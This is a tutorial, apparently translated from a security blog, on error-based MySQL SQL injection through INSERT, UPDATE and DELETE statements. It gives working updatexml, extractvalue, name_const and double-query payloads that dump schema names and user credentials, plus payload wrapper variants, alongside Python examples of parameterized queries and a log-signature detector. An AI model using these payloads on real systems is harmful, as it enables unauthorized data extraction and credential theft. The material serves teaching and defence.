An Unconventional Approach to SQL Injection


 Preface: compared with SELECT-based SQL injection, injecting through INSERT, UPDATE and DELETE statements is somewhat unconventional.

    Reference: http://www.exploit-db.com/wp-content/themes/exploit/docs/33253.pdf

0x1 Prerequisites

  a. A MySQL database

  b. Create the database and table used for the experiment

CREATE DATABASE newdb;
USE newdb;
CREATE TABLE users (
  id int(3) NOT NULL AUTO_INCREMENT,
  username varchar(20) NOT NULL,
  password varchar(20) NOT NULL,
  PRIMARY KEY (id)
);

  c. Insert some sample data: INSERT INTO users (id, username, password) VALUES (1, 'r00tgrok', 'ohmygod_is_r00tgrok');

 

0x2 Using the updatexml() function  // XPath injection

  1. Injection

  a. Payload format: or updatexml(1,concat(0x7e,(version())),0) or

  b. INSERT injection: INSERT INTO users (id, username, password) VALUES (2,'Pseudo_Z' or updatexml(1,concat(0x7e,(version())),0) or'', 'security-eng');

  c. UPDATE injection: UPDATE users SET password='security-eng' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2 and username='Pseudo_Z';

  d. DELETE injection: DELETE FROM users WHERE id=2 or updatexml(1,concat(0x7e,(version())),0) or'';
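All three statements above share one root cause: the user-supplied value is spliced into the statement text, so the quote in the value closes the string literal and everything after it is parsed as SQL, where updatexml() then raises an error carrying whatever expression it was handed. The following Python example is added here for illustration and is not code from the original post or the referenced paper. It contrasts the string-concatenated INSERT with a parameterized one. It uses the standard sqlite3 module so that it runs offline; the users table layout and the payload string come from this page, while the function names (insert_unsafe, insert_safe, demo) are my own. On MySQL the unsafe path would execute and leak version(); on sqlite3 the same statement fails with "no such function", which still proves the injected text reached the parser as code rather than data.

```python
import sqlite3

# Payload from section 0x2 of this page: the value an attacker submits as the "username".
PAYLOAD = "Pseudo_Z' or updatexml(1,concat(0x7e,(version())),0) or'"


def make_db():
    """In-memory database with the users table from section 0x1 (sqlite3 dialect)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE users (id INTEGER PRIMARY KEY, "
        "username TEXT NOT NULL, password TEXT NOT NULL)"
    )
    return conn


def insert_unsafe(conn, user_id, username, password):
    """Vulnerable: the username is concatenated into the SQL text.

    The quote inside PAYLOAD terminates the literal, so "or updatexml(...) or"
    becomes part of the statement. Returns the statement text for inspection.
    """
    sql = (
        "INSERT INTO users (id, username, password) VALUES "
        f"({user_id}, '{username}', '{password}')"
    )
    conn.execute(sql)
    return sql


def insert_safe(conn, user_id, username, password):
    """Hardened: placeholders bind the value as data, so the driver never
    hands it to the SQL parser as statement text."""
    sql = "INSERT INTO users (id, username, password) VALUES (?, ?, ?)"
    conn.execute(sql, (user_id, username, password))
    return sql


def stored_username(conn, user_id):
    """Read back what actually landed in the table for the given id."""
    row = conn.execute(
        "SELECT username FROM users WHERE id = ?", (user_id,)
    ).fetchone()
    return row[0] if row else None


def demo():
    """Run both paths against a fresh database.

    Returns (unsafe_outcome, safe_stored_value): the unsafe outcome describes
    whether the injected text was parsed as SQL; the safe value is the literal
    payload string stored verbatim.
    """
    conn = make_db()
    try:
        insert_unsafe(conn, 2, PAYLOAD, "security-eng")
        unsafe_outcome = "executed"  # what MySQL would do: updatexml() fires
    except sqlite3.OperationalError as exc:
        # sqlite3 has no updatexml()/concat()/version(); the "no such function"
        # error shows the payload was compiled as SQL, not treated as a string.
        unsafe_outcome = f"parsed as SQL: {exc}"
    insert_safe(conn, 3, PAYLOAD, "security-eng")
    return unsafe_outcome, stored_username(conn, 3)


if __name__ == "__main__":
    print(demo())
```

The only difference between the two functions is the placeholder, which is why parameterized statements (or an equivalent prepared-statement API in the application's MySQL driver) are the fix for every variant on this page, not just the INSERT case.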

  2. Extracting data

  a. Payload format:

  or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or

  b. Extracting table names via INSERT:

INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

  c. Extracting column names via INSERT

INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat(column_name) FROM information_schema.columns WHERE table_name='users' limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

 

  d. Dumping rows via INSERT

INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '', 'ohmygod_is_r00tgrok');

  e. Dumping rows via DELETE

  DELETE FROM users WHERE id=1 or updatexml(0,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM users limit 0,1)),0) or '';

  f. Dumping rows via UPDATE?

  The same table cannot be dumped through UPDATE, but a different table can:

  UPDATE students SET name='Nicky' or Updatexml(1,concat(0x7e,(SELECT concat_ws(':',id, username, password) FROM newdb.users limit 0,1)),0) or'' WHERE id=1;

  3. Tips

  a. The statement errors out, and the error message carries the information being extracted.

  b. Following the code in the author's paper on MySQL 5.6.19, the earlier extraction steps succeed, but the later dump fails with: [Err] 1093 - You can't specify target table 'users' for update in FROM clause

  c. Searching Google turned up two references:

  Case 1:

   // Failing code:  DELETE FROM table_name WHERE column_name IN (SELECT column_name FROM table_name WHERE column_name > 10);

   // Fixed code:    DELETE FROM table_name WHERE column_name IN (SELECT * FROM (SELECT column_name FROM table_name WHERE column_name > 10) AS X);

   // Explanation:   rows cannot be deleted from the same data source that the subquery reads from; the same applies to UPDATE.

  Case 2:

// Failing code:
CREATE TABLE comments(id int primary key, phrase text, uid int);
INSERT INTO comments VALUES(1, 'admin user comments',1), (2, 'HR User Comments',2), (3, 'RH User Comments',2);
UPDATE comments SET phrase = (SELECT phrase FROM comments WHERE uid=2 AND id=2) WHERE id = 3;

  Fixed code:

UPDATE comments SET phrase = (SELECT phrase FROM (SELECT * FROM comments) AS c1 WHERE c1.uid=2 AND c1.id=2) WHERE id = 3;

  Explanation: MySQL does not allow UPDATE or DELETE on a table while a subquery in the same statement reads from that table. MySQL treats a subquery in a FROM clause as a temporary table; wrapping the subquery one level deeper inside FROM forces it to be executed and materialized into a temporary table, which the outer subquery then references implicitly.

  4. updatexml() [returns the XML fragment with the replacement applied] is one of MySQL's XML functions. The other is extractvalue() [extracts a value from an XML string using XPath notation], which is also used below.

  e.g.  SET @xml = '<a><b>X</b><b>Y</b></a>';

        SET @i = 1, @j = 2;
        SELECT @i, ExtractValue(@xml, '//b[$@i]');

  // ExtractValue(xml_frag, xpath_expr)   // UpdateXML(xml_target, xpath_expr, new_xml)

  XPath in MySQL has a number of restrictions: node-set comparisons are not supported, nor are functions such as string(). XPath injection is similar to SQL injection, with slightly different syntax.

 

0x3 Using the extractvalue() function

  a. Payload format: or extractvalue(1,concat(0x7e,database())) or

  b. Injection:

   INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,database())) or'', 'Pseudo_Z');

    UPDATE users SET password='Nicky' or extractvalue(1,concat(0x7e,database())) or'' WHERE id=2 and username='Pseudo_Z';

    DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or''; 

 

  c. Extracting data

INSERT INTO users (id, username, password) VALUES (2,'r00tgrok' or extractvalue(1,concat(0x7e,(SELECT concat(table_name) FROM information_schema.tables WHERE table_schema=database() limit 0,1))) or'', 'balabala');

  Dumping rows, and the UPDATE and DELETE forms, work the same way as with updatexml() above.

 

0x4 Using name_const()  // introduced in 5.0.13; returns whichever value it is given

  a. Payload format: or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or

  b. Injection:

UPDATE users SET password='Nicky' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2 and username='Pseudo_Z';

  c. Extracting data

INSERT INTO users (id, username, password) VALUES (1,'admin' or (SELECT*FROM(SELECT name_const((SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1),name_const(( SELECT table_name FROM information_schema.tables WHERE table_schema=database() limit 0,1),1))a) or '', 'oyyoug0d');

 

0x5 Double-query injection  // MySQL has no double query, so a subquery is used instead

  1. Injection

INSERT INTO users (id, username, password) VALUES (1,'r00tgrok' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'Bl4ckhat');

DELETE FROM users WHERE id=1 or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT concat(0x7e,0x27,cast(database() as char),0x27,0x7e)) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a)or'' ;

 

  2. Extracting data

INSERT INTO users (id, username, password) VALUES (1, 'Pseudo_Z' or (SELECT 1 FROM(SELECT count(*),concat((SELECT (SELECT (SELECT concat(0x7e,0x27,cast(users.username as char),0x27,0x7e) FROM `newdb`.users LIMIT 0,1) ) FROM information_schema.tables limit 0,1),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or '', 'jesus-2014');

 

0x6 Other variants

' or (payload) or '
' and (payload) and '
' or (payload) and '
' or (payload) and '='
'* (payload) *'
' or (payload) and '
" – (payload) – "
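Every technique in sections 0x2 through 0x6 leaves two artifacts a defender can look for: a write statement (INSERT, UPDATE or DELETE) that contains functions no application would normally put there (updatexml, extractvalue, name_const, the floor(rand(0)*2) ... group by construct, information_schema lookups), and the characteristic error messages the server returns (an XPATH syntax error carrying the leaked value, or a duplicate-key error on group_key). The following Python detector is an added example, not part of the original post or the referenced paper. It scans log lines in the style of the MySQL general query log and an application error log; the sample lines are constructed for this example, and the signature names and function names are my own.

```python
import re

# Constructed sample lines (not from a real system), mixing MySQL general-log style
# entries with two application-side error lines of the kind these payloads provoke.
SAMPLE_LOG = """\
2024-01-01T10:00:01 12 Query INSERT INTO users (id, username, password) VALUES (7, 'alice', 'x')
2024-01-01T10:00:02 12 Query UPDATE users SET password='x' or updatexml(2,concat(0x7e,(version())),0) or'' WHERE id=2
2024-01-01T10:00:03 13 Query DELETE FROM users WHERE id=1 or extractvalue(1,concat(0x7e,database())) or''
2024-01-01T10:00:04 13 Query SELECT name FROM products WHERE id = 42
2024-01-01T10:00:05 14 Query UPDATE users SET password='n' or (SELECT*FROM(SELECT(name_const(version(),1)),name_const(version(),1))a) or '' WHERE id=2
2024-01-01T10:00:06 14 Query INSERT INTO users (id, username, password) VALUES (1,'r00tgrok' or (SELECT 1 FROM(SELECT count(*),concat((SELECT database()),floor(rand(0)*2))x FROM information_schema.columns group by x)a) or'', 'b')
2024-01-01T10:00:07 app ERROR 1105 XPATH syntax error: '~5.6.19'
2024-01-01T10:00:08 app ERROR 1062 Duplicate entry '~'newdb'~1' for key 'group_key'
"""

# Each signature maps to one technique discussed on this page.
SIGNATURES = [
    ("xpath-error-function",  re.compile(r"\b(updatexml|extractvalue)\s*\(", re.I)),
    ("name_const-trick",      re.compile(r"\bname_const\s*\(", re.I)),
    ("double-query-group-by", re.compile(
        r"floor\s*\(\s*rand\s*\(\s*0?\s*\)\s*\*\s*2\s*\).*group\s+by", re.I | re.S)),
    ("schema-enumeration",    re.compile(r"information_schema\.(tables|columns)", re.I)),
    ("xpath-error-message",   re.compile(r"XPATH syntax error", re.I)),
    ("duplicate-key-leak",    re.compile(r"Duplicate entry '~", re.I)),
]

# General-log entries record the statement kind after the word "Query".
WRITE_STMT = re.compile(r"\bQuery\s+(INSERT|UPDATE|DELETE)\b", re.I)


def scan_line(line):
    """Return the list of signature names that match one log line."""
    hits = [name for name, rx in SIGNATURES if rx.search(line)]
    # An error-based payload inside a write statement is exactly the pattern
    # this page describes, so tag it separately for alerting.
    if hits and WRITE_STMT.search(line):
        hits.append("payload-in-write-statement")
    return hits


def scan_log(text):
    """Return [(line_number, [signature, ...]), ...] for every matching line."""
    findings = []
    for number, line in enumerate(text.splitlines(), start=1):
        hits = scan_line(line)
        if hits:
            findings.append((number, hits))
    return findings


if __name__ == "__main__":
    for number, hits in scan_log(SAMPLE_LOG):
        print(f"line {number}: {', '.join(hits)}")
```

The server-side error signatures are the cheaper ones to monitor: an application that never uses MySQL's XML functions should never see error 1105, and a Duplicate entry error on a key named group_key comes only from a GROUP BY on a derived table, so either string in an error log is worth an alert on its own even when the query text is not logged.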

 

Appendix: http://websec.ca/kb/sql_injection

